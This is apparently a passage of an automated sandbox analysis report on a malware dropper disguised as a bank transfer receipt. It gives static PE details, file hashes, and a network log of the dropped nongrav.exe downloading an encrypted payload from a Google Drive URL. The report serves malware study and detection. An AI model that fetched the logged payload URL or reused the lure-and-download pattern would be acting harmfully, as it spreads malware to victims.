                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints


                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Process:C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):102400
                Entropy (8bit):6.642357579130979
                Encrypted:false
                SSDEEP:1536:hs45GgwFzTYSKUc//9qrMyk3+lGsc5iTq0wHmYt:hN+zTYS5acZk3+lGuqzH7t
                MD5:BEB33BD2BF3282F8C86081144236545D
                SHA1:03114FA621E4944693F897C6A015776F4B81BE2B
                SHA-256:F27110BABA677C03A4A1B87E19D5FB34C96A7E5F5A3D810E132442A240B97827
                SHA-512:DEAC0697F44163BE7AA6FCFAD1A0F7DD7B5BCB9CD9DA36B1DEC47368E14C336B97CE801D7AE938CDF605CCA92618777D062C93D091B3B5D1ECC40F2205E7984D
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.351689762780545
                TrID:
                • Win32 Executable (generic) a (10002005/4) 97.02%
                • Win32 MS Cabinet Self-Extractor (WExtract stub) (303627/2) 2.95%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
                File size:209920
                MD5:72a345c95142aee60e7df54b570c2c6b
                SHA1:aa479735d39ced67594ff0b0d5f91679e506ac38
                SHA256:a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
                SHA512:597d7673d2d69598d31a2edc71651c285d3253af53c06653a4d1504db9c71575141ace6fbc2371acd0517d43ac0b135c0b213979b657a035cbb1744504d437c7
                SSDEEP:6144:DK6g8ITQp0yN90QEN3Gm7CTon9jiNLk/ybI:DKRy90v30O9TeI

                File Icon

                Icon Hash:f8e0e4e8ecccc870

                Static PE Info

                General

                Entrypoint:0x4069d0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x545301EF [Fri Oct 31 03:28:47 2014 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:3
                File Version Major:6
                File Version Minor:3
                Subsystem Version Major:6
                Subsystem Version Minor:3
                Import Hash:bc70c4fa605f17c85050b7c7b6d42e44

                Entrypoint Preview


                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa294 | 0xb4 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x2a408 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x37000 | 0x8c0 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x10a0 | 0x1c | .text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13d8 | 0x40 | .text
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x290 | .idata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x6964 | 0x6a00 | False | 0.572044516509 | data | 6.35037999484 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data | 0x8000 | 0x1a8c | 0x400 | False | 0.3232421875 | data | 3.17592784688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .idata | 0xa000 | 0x107c | 0x1200 | False | 0.418402777778 | data | 5.04714087963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc | 0xc000 | 0x2b000 | 0x2a600 | False | 0.8237117441 | data | 7.44533811021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x37000 | 0x8c0 | 0xa00 | False | 0.771875 | data | 6.37328857441 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                AVI | 0xc9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
                RT_ICON | 0xf814 | 0x668 | data | English | United States
                RT_ICON | 0xfe7c | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291109880, next used block 28872 | English | United States
                RT_ICON | 0x10164 | 0x1e8 | data | English | United States
                RT_ICON | 0x1034c | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                RT_ICON | 0x10474 | 0xea8 | data | English | United States
                RT_ICON | 0x1131c | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15066613, next used block 15000828 | English | United States
                RT_ICON | 0x11bc4 | 0x6c8 | data | English | United States
                RT_ICON | 0x1228c | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                RT_ICON | 0x127f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                RT_ICON | 0x201c8 | 0x25a8 | data | English | United States
                RT_ICON | 0x22770 | 0x10a8 | data | English | United States
                RT_ICON | 0x23818 | 0x988 | data | English | United States
                RT_ICON | 0x241a0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                RT_DIALOG | 0x24608 | 0x2f2 | data | English | United States
                RT_DIALOG | 0x248fc | 0x1b0 | data | English | United States
                RT_DIALOG | 0x24aac | 0x166 | data | English | United States
                RT_DIALOG | 0x24c14 | 0x1c0 | data | English | United States
                RT_DIALOG | 0x24dd4 | 0x130 | data | English | United States
                RT_DIALOG | 0x24f04 | 0x120 | data | English | United States
                RT_STRING | 0x25024 | 0x8c | data | English | United States
                RT_STRING | 0x250b0 | 0x520 | data | English | United States
                RT_STRING | 0x255d0 | 0x5cc | data | English | United States
                RT_STRING | 0x25b9c | 0x4b0 | data | English | United States
                RT_STRING | 0x2604c | 0x44a | data | English | United States
                RT_STRING | 0x26498 | 0x3ce | data | English | United States
                RT_RCDATA | 0x26868 | 0x7 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x26870 | 0xf062 | Microsoft Cabinet archive data, 61538 bytes, 1 file | English | United States
                RT_RCDATA | 0x358d4 | 0x4 | data | English | United States
                RT_RCDATA | 0x358d8 | 0x24 | data | English | United States
                RT_RCDATA | 0x358fc | 0x7 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x35904 | 0x7 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x3590c | 0x4 | data | English | United States
                RT_RCDATA | 0x35910 | 0x7 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x35918 | 0x4 | data | English | United States
                RT_RCDATA | 0x3591c | 0xc | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x35928 | 0x4 | data | English | United States
                RT_RCDATA | 0x3592c | 0x9 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x35938 | 0x7 | ASCII text, with no line terminators | English | United States
                RT_RCDATA | 0x35940 | 0x7 | ASCII text, with no line terminators | English | United States
                RT_GROUP_ICON | 0x35948 | 0xbc | data | English | United States
                RT_VERSION | 0x35a04 | 0x41c | data | English | United States
                RT_MANIFEST | 0x35e20 | 0x5e7 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

                Imports

                DLL | Import
                ADVAPI32.dll | OpenProcessToken, GetTokenInformation, RegSetValueExA, EqualSid, RegQueryValueExA, LookupPrivilegeValueA, RegCreateKeyExA, RegOpenKeyExA, RegQueryInfoKeyA, RegDeleteValueA, AllocateAndInitializeSid, FreeSid, AdjustTokenPrivileges, RegCloseKey
                KERNEL32.dll | GetPrivateProfileIntA, GetFileAttributesA, IsDBCSLeadByte, GetSystemDirectoryA, GlobalUnlock, GetShortPathNameA, CreateDirectoryA, FindFirstFileA, GetLastError, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, GlobalFree, FindClose, GetPrivateProfileStringA, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, FindNextFileA, CompareStringA, _lopen, CloseHandle, LocalFree, DeleteFileA, ExitProcess, DosDateTimeToFileTime, CreateFileA, FindResourceA, GlobalAlloc, ExpandEnvironmentStringsA, LoadResource, WaitForSingleObject, SetEvent, GetModuleHandleW, FormatMessageA, SetFileTime, WriteFile, GetDriveTypeA, GetVolumeInformationA, TerminateThread, SizeofResource, CreateEventA, GetExitCodeProcess, CreateProcessA, _llseek, SetCurrentDirectoryA, GetTempFileNameA, ResetEvent, LockResource, GetSystemInfo, LoadLibraryExA, CreateMutexA, GetCurrentDirectoryA, GetVersionExA, GetVersion, GetTempPathA, CreateThread, LocalFileTimeToFileTime, SetFilePointer, GetWindowsDirectoryA, lstrcmpA, _lclose, GlobalLock, GetCurrentProcess, FreeResource, FreeLibrary, Sleep, GetStartupInfoA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, OutputDebugStringA, RtlUnwind, GetModuleHandleA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, MulDiv, GetDiskFreeSpaceA, ReadFile
                GDI32.dll | GetDeviceCaps
                USER32.dll | GetDC, SendMessageA, SetForegroundWindow, MsgWaitForMultipleObjects, SendDlgItemMessageA, GetWindowRect, MessageBoxA, GetWindowLongA, PeekMessageA, ReleaseDC, GetDlgItem, SetWindowPos, ShowWindow, DispatchMessageA, SetWindowTextA, EnableWindow, CallWindowProcA, DialogBoxIndirectParamA, GetDlgItemTextA, LoadStringA, MessageBeep, CharUpperA, CharNextA, ExitWindowsEx, CharPrevA, EndDialog, GetDesktopWindow, SetDlgItemTextA, SetWindowLongA, GetSystemMetrics
                msvcrt.dll | memset, ?terminate@@YAXXZ, _controlfp, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _acmdln, _initterm, _amsg_exit, __p__commode, _XcptFilter, _errno, _vsnprintf, __setusermatherr
                COMCTL32.dll |
                Cabinet.dll |
                VERSION.dll | GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA

                Version Infos

                Description | Data
                LegalCopyright | Microsoft Corporation. All rights reserved.
                InternalName | Wextract
                FileVersion | 11.00.9600.16384 (winblue_rtm.130821-1623)
                CompanyName | Microsoft Corporation
                ProductName | Internet Explorer
                ProductVersion | 11.00.9600.16384
                FileDescription | Win32 Cabinet Self-Extractor
                OriginalFilename | WEXTRACT.EXE .MUI
                Translation | 0x0409 0x04b0

                Possible Origin

                Language of compilation system | Country where language is spoken
                English | United States

                Network Behavior

                Network Port Distribution

                TCP Packets


                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 15, 2021 14:13:47.532352924 CET | 58540 | 53 | 192.168.2.3 | 8.8.8.8
                Dec 15, 2021 14:13:47.557713032 CET | 53 | 58540 | 8.8.8.8 | 192.168.2.3
                Dec 15, 2021 14:13:48.603138924 CET | 55108 | 53 | 192.168.2.3 | 8.8.8.8
                Dec 15, 2021 14:13:48.630215883 CET | 53 | 55108 | 8.8.8.8 | 192.168.2.3

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Dec 15, 2021 14:13:47.532352924 CET | 192.168.2.3 | 8.8.8.8 | 0x4b1d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
                Dec 15, 2021 14:13:48.603138924 CET | 192.168.2.3 | 8.8.8.8 | 0x5477 | Standard query (0) | doc-0c-ao-docs.googleusercontent.com | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Dec 15, 2021 14:13:47.557713032 CET | 8.8.8.8 | 192.168.2.3 | 0x4b1d | No error (0) | drive.google.com |  | 172.217.168.46 | A (IP address) | IN (0x0001)
                Dec 15, 2021 14:13:48.630215883 CET | 8.8.8.8 | 192.168.2.3 | 0x5477 | No error (0) | doc-0c-ao-docs.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001)
                Dec 15, 2021 14:13:48.630215883 CET | 8.8.8.8 | 192.168.2.3 | 0x5477 | No error (0) | googlehosted.l.googleusercontent.com |  | 172.217.168.1 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • drive.google.com
                • doc-0c-ao-docs.googleusercontent.com

                HTTPS Proxied Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.3 | 49837 | 172.217.168.46 | 443 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Timestamp | kBytes transferred | Direction | Data
                2021-12-15 13:13:48 UTC | 0 | OUT | GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: drive.google.com
                Cache-Control: no-cache
                2021-12-15 13:13:48 UTC | 0 | IN | HTTP/1.1 302 Moved Temporarily
                Content-Type: text/html; charset=UTF-8
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Wed, 15 Dec 2021 13:13:48 GMT
                Location: https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Content-Security-Policy: script-src 'nonce-EMXjOSw4Y96UYi94oVhyrg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                X-Content-Type-Options: nosniff
                X-Frame-Options: SAMEORIGIN
                X-XSS-Protection: 1; mode=block
                Server: GSE
                Set-Cookie: NID=511=XU9cPhkPEzophwyh3MGRmWojEC8XYsCGUUVP6Xpqww4mZOveOqwpw9LswvCggWgLghsUnufCd-udYmc2G9SprDfT_qeCcigMPM-e7iTdF6KKL0f7o5y54m9VMjYjAJPiqx243dRWK3_A5drOGaroDMJUdFdTi2GeepTp1DPkEWc; expires=Thu, 16-Jun-2022 13:13:48 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                Accept-Ranges: none
                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                Connection: close
                Transfer-Encoding: chunked
                2021-12-15 13:13:48 UTC | 1 | IN | Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3
                2021-12-15 13:13:48 UTC | 2 | IN | Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.3 | 49838 | 172.217.168.1 | 443 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
                Timestamp | kBytes transferred | Direction | Data
                2021-12-15 13:13:48 UTC | 2 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Cache-Control: no-cache
                Host: doc-0c-ao-docs.googleusercontent.com
                Connection: Keep-Alive
                2021-12-15 13:13:48 UTC | 2 | IN | HTTP/1.1 200 OK
                X-GUploader-UploadID: ADPycdv26AmqCAkUuCC8XjAmfSVQ6tFuZ4Bys0cnWeMxpGn3x0acHygtOgTHWktUsFvCah2tswGnAPz-B4P5DSK-JmxSQU0b9g
                Access-Control-Allow-Origin: *
                Access-Control-Allow-Credentials: false
                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, 
X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                Access-Control-Allow-Methods: GET,OPTIONS
                Content-Type: application/macbinary
                Content-Disposition: attachment;filename="XL bin_zuCGjTEmqF178.bin";filename*=UTF-8''XL%20bin_zuCGjTEmqF178.bin
                Content-Length: 167488
                Date: Wed, 15 Dec 2021 13:13:48 GMT
                Expires: Wed, 15 Dec 2021 13:13:48 GMT
                Cache-Control: private, max-age=0
                X-Goog-Hash: crc32c=063w5A==
                Server: UploadServer
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                Connection: close
                2021-12-15 13:13:48 UTC45INData Raw: 52 0b 80 98 b3 33 f2 e5 4a a9 99 84 a1 4a 7c 67 7a 9a 26 61 a3 8d 7c ce d4 74 1b b1 38 90 1c e4 d5 59 62 3b b1 ce 7d b6 12 e0 5e 0c 27 f1 58 89 a0 5f 60 7c 5a 73 4e 1c 9b 3f 2d 89 18 38 14 26 85 3f 98 00 f5 38 b3 ca 82 89 b8 52 99 c9 e4 ab 64 6b d0 e0 98 fd 22 8e 55 00 eb 00 5a 8c b6 19 74 34 38 a2 c4 de 4b df 41 a8 60 08 f3 90 63 24 27 dd 9d 25 a5 51 53 85 73 10 82 d5 1b c7 25 18 58 46 ac 42 7e 37 da a5 00 57 cc 7e 07 5f 57 e9 f5 09 93 12 ce 87 33 23 33 92 a6 70 c9 da 2a df 32 30 37 bb a3 97 cf 7a fb e0 3b 5f bd 10 f6 7e 48 f0 59 64 78 7d 7a 3f f4 9d df 0a 0c aa 52 a9 c3 86 b0 f2 be 75 81 3f c4 ff d7 c1 25 8f 91 92 89 7c 21 6e 7e 6f ca 48 7b 7d f2 07 ce e8 e0 0e 34 8e 53 b4 65 8d 8c 76 73 f5 9b 56 de 7e 36 bd 85 4c 2f c1 97 8e 87 01 70 d0 a6 30 ca 70 71
                Data Ascii: R3JJ|gz&a|t8Yb;}^'X_`|ZsN?-8&?8Rdk"UZt48KA`c$'%QSs%XFB~7W~_W3#3p*207z;_~HYdx}z?Ru?%|!n~oH{}4SevsV~6L/p0pq
                2021-12-15 13:13:48 UTC47INData Raw: fe 15 07 58 d3 3c e5 a9 9b 68 f2 d4 ef 22 cd 6c 46 07 48 48 d8 44 59 00 43 e0 34 46 21 19 27 06 ad 1b b2 17 9a ff 31 39 f4 49 a2 93 01 a9 e1 52 07 e5 13 67 d6 c8 6f d6 08 79 8c ee e0 f6 0e ae cb 37 a4 50 04 46 08 9b c3 c4 23 d0 91 22 5b ef f0 02 28 6b f4 7c 55 d2 87 bd 2a c8 14 c3 f8 9b 3d ad 32 bb 74 ea e1 64 26 79 65 a1 de 83 2f 73 e3 3e ff fa 95 36 6d 25 66 95 1b bd ea d4 5b 7e 91 41 b2 45 da df c5 b0 ff 8c 15 89 9a ec 6e 1e ee b1 f2 e7 82 dc 5c 85 71 42 25 53 88 c8 3b bf 84 99 c5 a1 84 a5 e4 f6 af dd 08 7c 5d da b5 b6 e1 ec 7e db fa c9 e5 61 cd 8f 9d 66 09 14 ff 08 aa 9d fe 60 e0 13 8c 3e bd f1 9b f4 bd a0 38 ab 6d 0f 76 32 20 57 bc 19 2d 27 e2 f5 18 fc bb 4d 87 a1 32 36 91 d0 4d db d3 01 a3 38 93 6a bb 3e 21 4a 40 29 fa d8 70 26 61 05 6e d1 43 0d f1
                Data Ascii: X<h"lFHHDYC4F!'19IRgoy7PF#"[(k|U*=2td&ye/s>6m%f[~AEn\qB%S;|]~af`>8mv2 W-'M26M8j>!J@)p&anC
                2021-12-15 13:13:48 UTC48INData Raw: f8 4d e7 66 a7 90 35 4a e0 a5 cf d9 4e 52 35 33 62 26 ab ea 35 75 bb b0 42 1a 49 bf 4c 67 c1 7d 91 27 87 32 53 65 ff f5 bc da 6b 01 ae 45 49 5e 20 bc e7 ca 13 65 24 58 53 2d 36 b4 c4 f0 60 cb 6a 12 75 34 48 0a b3 dd 5e 97 24 54 1c ac 1f e2 65 4b cc 81 ef 43 1d cb f4 4e 4d ff de 07 46 cd d4 05 cc bb d9 f0 0f 4a d9 c7 60 c9 b1 c1 45 63 6e 32 8d 80 da 08 1d a0 3f 9f 32 a3 26 71 8f 38 5b ef e2 5e 03 d4 fd 90 a5 9e cd 47 81 d9 0e 25 3a dc 4f 21 74 0a 37 e7 fd 72 f2 fe 8f d7 f4 88 7d 21 5d c8 41 0e 61 21 df e6 04 b0 3b f1 9e f5 da fd a8 bc f6 25 c7 39 04 a6 18 13 93 05 bf 17 66 82 3e 78 da f3 27 ed 21 62 2d 2c 5a 61 48 c7 1c 8f f1 4f 14 de a6 f7 8b ad 41 f5 f0 92 f3 6f 4f 0c c8 2f 68 b6 8a 90 ba 58 41 6d 41 47 e1 28 f9 ea 85 a4 38 44 73 34 68 47 a4 bd 51 bc 26
                Data Ascii: Mf5JNR53b&5uBILg}'2SekEI^ e$XS-6`ju4H^$TeKCNMFJ`Ecn2?2&q8[^G%:O!t7r}!]Aa!;%9f>x'!b-,ZaHOAoO/hXAmAG(8Ds4hGQ&
                2021-12-15 13:13:48 UTC49INData Raw: c5 f5 87 3c ab 1b b8 24 36 5e d3 ae c6 d3 0b 53 08 2f d8 7b 99 52 13 c3 4c f8 c1 99 4e a9 6c 90 4e c2 d0 a5 75 03 70 b5 43 c7 6f f7 ca cc d2 2f 4a b9 be 48 b5 12 75 0e 0d b7 9c a2 aa 5f a0 eb c3 d3 b7 4d 74 23 b1 4d 04 97 44 e9 88 f7 23 7a 76 1d 4c a4 b8 61 06 02 ff eb 7b 04 88 30 82 3a 99 a3 1a c9 a3 7c 89 6e 94 46 6a 48 22 34 80 79 79 0c a7 32 bb 7a ab cf 1f 14 6d 35 cc 50 41 8d a6 ea 18 c2 83 43 ed 46 e9 ea 04 d2 ef b0 31 24 88 86 7a a0 0d 9b 5f f4 93 f9 d5 22 26 46 22 03 ed 82 04 28 88 ed 4a 4d 27 98 8c 93 0f 90 31 65 6e 8f 93 bf d0 f8 38 14 1d d6 cb 28 28 cb 84 18 19 33 c3 c9 be 2d 9d 9f d1 ca 13 0f a9 7b 15 17 f3 bf fe 7d f7 57 64 95 a1 55 1e ca 96 03 79 41 1b 09 13 e6 bc 26 00 e3 8c db 08 e2 8b cb d3 80 dc bd 4e 73 ba 22 59 95 0b 80 25 ef d5 5d 6d
                Data Ascii: <$6^S/{RLNlNupCo/JHu_Mt#MD#zvLa{0:|nFjH"4yy2zm5PACF1$z_"&F"(JM'1en8((3-{}WdUyA&Ns"Y%]m
